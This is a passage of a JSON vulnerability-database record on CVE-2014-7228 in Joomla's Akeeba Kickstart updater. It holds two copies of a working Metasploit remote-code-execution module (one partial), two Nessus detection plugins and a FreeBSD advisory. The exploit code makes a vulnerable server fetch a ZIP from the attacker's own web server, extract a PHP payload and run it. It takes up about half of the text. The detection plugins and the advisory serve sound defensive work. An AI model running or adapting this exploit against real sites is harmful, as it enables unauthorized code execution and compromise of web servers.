check\r\n res = send_request_cgi(\r\n 'uri' => normalize_uri(target_uri, 'administrator', 'components', 'com_joomlaupdate', 'restoration.php')\r\n )\r\n\r\n if res && res.code == 200\r\n return Exploit::CheckCode::Detected\r\n end\r\n\r\n Exploit::CheckCode::Safe\r\n end\r\n\r\n def primer\r\n srv_uri = \"#{get_uri}/#{rand_text_alpha(4 + rand(3))}.zip\"\r\n\r\n php_serialized_akfactory = 'O:9:\"AKFactory\":1:{s:18:\"' + \"\\x00\" + 'AKFactory' + \"\\x00\" + 'varlist\";a:2:{s:27:\"kickstart.security.password\";s:0:\"\";s:26:\"kickstart.setup.sourcefile\";s:' + srv_uri.length.to_s + ':\"' + srv_uri + '\";}}'\r\n php_filename = rand_text_alpha(8 + rand(8)) + '.php'\r\n\r\n # Create the zip archive\r\n print_status(\"Creating archive with file #{php_filename}\")\r\n zip_file = Rex::Zip::Archive.new\r\n zip_file.add_file(php_filename, payload.encoded)\r\n @zip = zip_file.pack\r\n\r\n # First step: call restore to run _prepare() and get an initialized AKFactory\r\n print_status(\"#{peer} - Sending PHP serialized object...\")\r\n res = send_request_cgi({\r\n 'uri' => normalize_uri(target_uri, 'administrator', 'components', 'com_joomlaupdate', 'restore.php'),\r\n 'vars_get' => {\r\n 'task' => 'stepRestore',\r\n 'factory' => Rex::Text.encode_base64(php_serialized_akfactory)\r\n }\r\n })\r\n\r\n unless res && res.code == 200 && res.body && res.body =~ /^###\\{\"status\":true.*\\}###/\r\n print_status(\"#{res.code}\\n#{res.body}\")\r\n fail_with(Failure::Unknown, \"#{peer} - Unexpected response\")\r\n end\r\n\r\n # Second step: modify the currentPartNumber within the returned serialized AKFactory\r\n json = /###(.*)###/.match(res.body)[1]\r\n begin\r\n b64encoded_prepared_factory = JSON.parse(json)['factory']\r\n rescue JSON::ParserError\r\n fail_with(Failure::Unknown, \"#{peer} - Unexpected response, cannot parse JSON\")\r\n end\r\n\r\n prepared_factory = Rex::Text.decode_base64(b64encoded_prepared_factory)\r\n modified_factory = prepared_factory.gsub('currentPartNumber\";i:0', 'currentPartNumber\";i:-1')\r\n\r\n print_status(\"#{peer} - Sending initialized and modified AKFactory...\")\r\n res = send_request_cgi({\r\n 'uri' => normalize_uri(target_uri, 'administrator', 'components', 'com_joomlaupdate', 'restore.php'),\r\n 'vars_get' => {\r\n 'task' => 'stepRestore',\r\n 'factory' => Rex::Text.encode_base64(modified_factory)\r\n }\r\n })\r\n\r\n unless res && res.code == 200 && res.body && res.body =~ /^###\\{\"status\":true.*\\}###/\r\n fail_with(Failure::Unknown, \"#{peer} - Unexpected response\")\r\n end\r\n\r\n register_files_for_cleanup(php_filename)\r\n\r\n print_status(\"#{peer} - Executing payload...\")\r\n send_request_cgi({\r\n 'uri' => normalize_uri(target_uri, 'administrator', 'components', 'com_joomlaupdate', php_filename)\r\n }, 2)\r\n\r\n end\r\n\r\n def exploit\r\n begin\r\n Timeout.timeout(datastore['HTTPDELAY']) { super }\r\n rescue Timeout::Error\r\n # When the server stops due to our timeout, this is raised\r\n end\r\n end\r\n\r\n # Handle incoming requests from the server\r\n def on_request_uri(cli, request)\r\n if @zip && request.uri =~ /\\.zip$/\r\n print_status(\"Sending the ZIP archive...\")\r\n send_response(cli, @zip, { 'Content-Type' => 'application/zip' })\r\n return\r\n end\r\n\r\n print_status(\"Sending not found...\")\r\n send_not_found(cli)\r\n end\r\n\r\nend", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/35033/"}], "zdt": [{"lastseen": "2018-04-14T21:53:51", "description": "This Metasploit module exploits a vulnerability found in Joomla! through 2.5.25, 3.2.5 and earlier 3.x versions and 3.3.0 through 3.3.4 versions. The vulnerability affects the Akeeba component, which is responsible for Joomla! updates. Nevertheless it is worth to note that this vulnerability is only exploitable during the update of the Joomla! CMS.", "edition": 2, "published": "2014-10-21T00:00:00", "type": "zdt", "title": "Joomla Akeeba Kickstart Unserialize Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-7228"], "modified": "2014-10-21T00:00:00", "id": "1337DAY-ID-22775", "href": "https://0day.today/exploit/description/22775", "sourceData": "##\r\n# This module requires Metasploit: http//metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\nrequire 'rex/zip'\r\nrequire 'json'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::Remote::HttpServer::HTML\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => \"Joomla Akeeba Kickstart Unserialize Remote Code Execution\",\r\n 'Description' => %q{\r\n This module exploits a vulnerability found in Joomla! through 2.5.25, 3.2.5 and earlier\r\n 3.x versions and 3.3.0 through 3.3.4 versions. The vulnerability affects the Akeeba\r\n component, which is responsible for Joomla! updates. Nevertheless it is worth to note\r\n that this vulnerability is only exploitable during the update of the Joomla! CMS.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Johannes Dahse', # Vulnerability discovery\r\n 'us3r777 <us3r777[at]n0b0.so>' # Metasploit module\r\n ],\r\n 'References' =>\r\n [\r\n [ 'CVE', '2014-7228' ],\r\n [ 'URL', 'http://developer.joomla.org/security/595-20140903-core-remote-file-inclusion.html'],\r\n [ 'URL', 'https://www.akeebabackup.com/home/news/1605-security-update-sep-2014.html'],\r\n [ 'URL', 'http://websec.wordpress.com/2014/10/05/joomla-3-3-4-akeeba-kickstart-remote-code-execution-cve-2014-7228/'],\r\n ],\r\n 'Platform' => ['php'],\r\n 'Arch' => ARCH_PHP,\r\n 'Targets' =>\r\n [\r\n [ 'Joomla < 2.5.25 / Joomla 3.x < 3.2.5 / Joomla 3.3.0 < 3.3.4', {} ]\r\n ],\r\n 'Stance' => Msf::Exploit::Stance::Aggressive,\r\n 'Privileged' => false,\r\n 'DisclosureDate' => \"Sep 29 2014\",\r\n 'DefaultTarget' => 0))\r\n\r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [true, 'The base path to Joomla', '/joomla']),\r\n OptInt.new('HTTPDELAY', [false, 'Seconds to wait before terminating web server', 5])\r\n ], self.class)\r\n end\r\n\r\n def check\r\n res = send_request_cgi(\r\n 'uri' => normalize_uri(target_uri, 'administrator', 'components', 'com_joomlaupdate', 'restoration.php')\r\n )\r\n\r\n if res && res.code == 200\r\n return Exploit::CheckCode::Detected\r\n end\r\n\r\n Exploit::CheckCode::Safe\r\n end\r\n\r\n def primer\r\n srv_uri = \"#{get_uri}/#{rand_text_alpha(4 + rand(3))}.zip\"\r\n\r\n php_serialized_akfactory = 'O:9:\"AKFactory\":1:{s:18:\"' + \"\\x00\" + 'AKFactory' + \"\\x00\" + 'varlist\";a:2:{s:27:\"kickstart.security.password\";s:0:\"\";s:26:\"kickstart.setup.sourcefile\";s:' + srv_uri.length.to_s + ':\"' + srv_uri + '\";}}'\r\n php_filename = rand_text_alpha(8 + rand(8)) + '.php'\r\n\r\n # Create the zip archive\r\n print_status(\"Creating archive with file #{php_filename}\")\r\n zip_file = Rex::Zip::Archive.new\r\n zip_file.add_file(php_filename, payload.encoded)\r\n @zip = zip_file.pack\r\n\r\n # First step: call restore to run _prepare() and get an initialized AKFactory\r\n print_status(\"#{peer} - Sending PHP serialized object...\")\r\n res = send_request_cgi({\r\n 'uri' => normalize_uri(target_uri, 'administrator', 'components', 'com_joomlaupdate', 'restore.php'),\r\n 'vars_get' => {\r\n 'task' => 'stepRestore',\r\n 'factory' => Rex::Text.encode_base64(php_serialized_akfactory)\r\n }\r\n })\r\n\r\n unless res && res.code == 200 && res.body && res.body =~ /^###\\{\"status\":true.*\\}###/\r\n print_status(\"#{res.code}\\n#{res.body}\")\r\n fail_with(Failure::Unknown, \"#{peer} - Unexpected response\")\r\n end\r\n\r\n # Second step: modify the currentPartNumber within the returned serialized AKFactory\r\n json = /###(.*)###/.match(res.body)[1]\r\n begin\r\n b64encoded_prepared_factory = JSON.parse(json)['factory']\r\n rescue JSON::ParserError\r\n fail_with(Failure::Unknown, \"#{peer} - Unexpected response, cannot parse JSON\")\r\n end\r\n\r\n prepared_factory = Rex::Text.decode_base64(b64encoded_prepared_factory)\r\n modified_factory = prepared_factory.gsub('currentPartNumber\";i:0', 'currentPartNumber\";i:-1')\r\n\r\n print_status(\"#{peer} - Sending initialized and modified AKFactory...\")\r\n res = send_request_cgi({\r\n 'uri' => normalize_uri(target_uri, 'administrator', 'components', 'com_joomlaupdate', 'restore.php'),\r\n 'vars_get' => {\r\n 'task' => 'stepRestore',\r\n 'factory' => Rex::Text.encode_base64(modified_factory)\r\n }\r\n })\r\n\r\n unless res && res.code == 200 && res.body && res.body =~ /^###\\{\"status\":true.*\\}###/\r\n fail_with(Failure::Unknown, \"#{peer} - Unexpected response\")\r\n end\r\n\r\n register_files_for_cleanup(php_filename)\r\n\r\n print_status(\"#{peer} - Executing payload...\")\r\n send_request_cgi({\r\n 'uri' => normalize_uri(target_uri, 'administrator', 'components', 'com_joomlaupdate', php_filename)\r\n }, 2)\r\n\r\n end\r\n\r\n def exploit\r\n begin\r\n Timeout.timeout(datastore['HTTPDELAY']) { super }\r\n rescue Timeout::Error\r\n # When the server stops due to our timeout, this is raised\r\n end\r\n end\r\n\r\n # Handle incoming requests from the server\r\n def on_request_uri(cli, request)\r\n if @zip && request.uri =~ /\\.zip$/\r\n print_status(\"Sending the ZIP archive...\")\r\n send_response(cli, @zip, { 'Content-Type' => 'application/zip' })\r\n return\r\n end\r\n\r\n print_status(\"Sending not found...\")\r\n send_not_found(cli)\r\n end\r\n\r\nend\n\n# 0day.today [2018-04-14] #", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/22775"}], "nessus": [{"lastseen": "2021-01-01T03:19:20", "description": "According to its self-reported version number, the Joomla!\ninstallation running on the remote web server is 2.5.x prior to\n2.5.26, 3.x prior to 3.2.6, or 3.3.x prior to 3.3.5. It is, therefore,\naffected by multiple vulnerabilities :\n\n - A security bypass vulnerability exists in the\n restore.php script during the extraction of backup\n archives or Joomla! update packages. An unauthenticated,\n remote attacker can exploit this, via a command message\n that extracts a crafted archive, to bypass command\n execution security restrictions and execute arbitrary\n code with the same privileges as the web server.\n (CVE-2014-7228)\n\n - An unspecified flaw exists due to inadequate checking\n that allows an unauthenticated, remote attacker to cause\n a denial of service condition. (CVE-2014-7229)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.", "edition": 28, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2014-10-08T00:00:00", "title": "Joomla! 2.5.x < 2.5.26 / 3.x < 3.2.6 / 3.3.x < 3.3.5 Multiple Vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-7229", "CVE-2014-7228"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:joomla:joomla\\!"], "id": "JOOMLA_335.NASL", "href": "https://www.tenable.com/plugins/nessus/78088", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(78088);\n script_version(\"1.11\");\n script_cvs_date(\"Date: 2019/11/25\");\n\n script_cve_id(\"CVE-2014-7228\", \"CVE-2014-7229\");\n script_bugtraq_id(70199, 70201);\n script_xref(name:\"EDB-ID\", value:\"35033\");\n\n script_name(english:\"Joomla! 2.5.x < 2.5.26 / 3.x < 3.2.6 / 3.3.x < 3.3.5 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the version of Joomla!.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a PHP application that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version number, the Joomla!\ninstallation running on the remote web server is 2.5.x prior to\n2.5.26, 3.x prior to 3.2.6, or 3.3.x prior to 3.3.5. It is, therefore,\naffected by multiple vulnerabilities :\n\n - A security bypass vulnerability exists in the\n restore.php script during the extraction of backup\n archives or Joomla! update packages. An unauthenticated,\n remote attacker can exploit this, via a command message\n that extracts a crafted archive, to bypass command\n execution security restrictions and execute arbitrary\n code with the same privileges as the web server.\n (CVE-2014-7228)\n\n - An unspecified flaw exists due to inadequate checking\n that allows an unauthenticated, remote attacker to cause\n a denial of service condition. (CVE-2014-7229)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n # https://www.joomla.org/announcements/release-news/5566-joomla-2-5-26-released.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?80de2915\");\n # https://www.joomla.org/announcements/release-news/5567-joomla-3-3-5-released.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?47bbcae3\");\n script_set_attribute(attribute:\"see_also\", value:\"https://developer.joomla.org/security/595-20140903.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://developer.joomla.org/security/596-20140904.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Joomla! version 2.5.26 / 3.2.6 / 3.3.5 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Joomla Akeeba Kickstart Unserialize Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/29\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/08\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:joomla:joomla\\!\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"joomla_detect.nasl\");\n script_require_keys(\"installed_sw/Joomla!\", \"www/PHP\", \"Settings/ParanoidReport\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"install_func.inc\");\n\napp = \"Joomla!\";\nget_install_count(app_name:app, exit_if_zero:TRUE);\n\nport = get_http_port(default:80, php:TRUE);\n\ninstall = get_single_install(\n app_name : app,\n port : port,\n exit_if_unknown_ver : TRUE\n);\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nversion = install['version'];\ninstall_loc = build_url(port:port, qs:install['path']);\n\nfix = \"2.5.26 / 3.2.6 / 3.3.5\";\n\n# Check granularity\nif (\n version =~ \"^2(\\.5)?$\" ||\n version =~ \"^3(\\.[0-3])?$\"\n) audit(AUDIT_VER_NOT_GRANULAR, app, port, version);\n\n# Versions 2.5.x < 2.5.26 / 3.x < 3.2.6 / 3.3.x < 3.3.5 are vulnerable\n# (There are Alpha versions of some builds)\nif (\n version =~ \"^2\\.5\\.([0-9]|1[0-9]|2[0-5])([^0-9]|$)\" ||\n version =~ \"^3\\.[01]([^0-9]|$)\" ||\n version =~ \"^3\\.2\\.[0-5]([^0-9]|$)\" ||\n version =~ \"^3\\.3\\.[0-4]([^0-9]|$)\"\n)\n{\n order = make_list(\"URL\", \"Installed version\", \"Fixed version\");\n report = make_array(\n order[0], install_loc,\n order[1], version,\n order[2], fix\n );\n report = report_items_str(report_items:report, ordered_fields:order);\n\n security_report_v4(port:port, extra:report, severity:SECURITY_HOLE);\n exit(0);\n}\nelse audit(AUDIT_WEB_APP_NOT_AFFECTED, app, install_loc, version);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-07T10:50:12", "description": "The JSST and the Joomla! Security Center report : [20140903] - Core -\nRemote File Inclusion Inadequate checking allowed the potential for\nremote files to be executed. [20140904] - Core - Denial of Service\nInadequate checking allowed the potential for a denial of service\nattack.", "edition": 22, "published": "2015-10-26T00:00:00", "title": "FreeBSD : Joomla! -- Core - Remote File Execution/Denial of Service vulnerabilities (cec4d01a-7ac5-11e5-b35a-002590263bf5)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-7229", "CVE-2014-7228"], "modified": "2015-10-26T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:joomla3", "cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:joomla2"], "id": "FREEBSD_PKG_CEC4D01A7AC511E5B35A002590263BF5.NASL", "href": "https://www.tenable.com/plugins/nessus/86590", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(86590);\n script_version(\"2.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2014-7228\", \"CVE-2014-7229\");\n\n script_name(english:\"FreeBSD : Joomla! -- Core - Remote File Execution/Denial of Service vulnerabilities (cec4d01a-7ac5-11e5-b35a-002590263bf5)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The JSST and the Joomla! Security Center report : [20140903] - Core -\nRemote File Inclusion Inadequate checking allowed the potential for\nremote files to be executed. [20140904] - Core - Denial of Service\nInadequate checking allowed the potential for a denial of service\nattack.\"\n );\n # http://developer.joomla.org/security-centre/595-20140903-core-remote-file-inclusion.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?7fe5ea10\"\n );\n # http://developer.joomla.org/security-centre/596-20140904-core-denial-of-service.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?90369311\"\n );\n # https://www.joomla.org/announcements/release-news/5567-joomla-3-3-5-released.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?47bbcae3\"\n );\n # https://www.joomla.org/announcements/release-news/5566-joomla-2-5-26-released.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?80de2915\"\n );\n # https://vuxml.freebsd.org/freebsd/cec4d01a-7ac5-11e5-b35a-002590263bf5.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?cec57b42\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Joomla Akeeba Kickstart Unserialize Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:joomla2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:joomla3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/10/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/10/26\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"joomla3<3.2.6\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"joomla3>=3.3.0<3.3.5\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"joomla2>=2.5.4<2.5.26\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "freebsd": [{"lastseen": "2019-05-29T18:33:00", "bulletinFamily": "unix", "cvelist": ["CVE-2014-7229", "CVE-2014-7228"], "description": "\nThe JSST and the Joomla! Security Center report:\n\n[20140903] - Core - Remote File Inclusion\nInadequate checking allowed the potential for remote files to be\n\t executed.\n\n\n[20140904] - Core - Denial of Service\nInadequate checking allowed the potential for a denial of service\n\t attack.\n\n", "edition": 4, "modified": "2014-09-30T00:00:00", "published": "2014-09-30T00:00:00", "id": "CEC4D01A-7AC5-11E5-B35A-002590263BF5", "href": "https://vuxml.freebsd.org/freebsd/cec4d01a-7ac5-11e5-b35a-002590263bf5.html", "title": "Joomla! -- Core - Remote File Execution/Denial of Service vulnerabilities", "type": "freebsd", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}
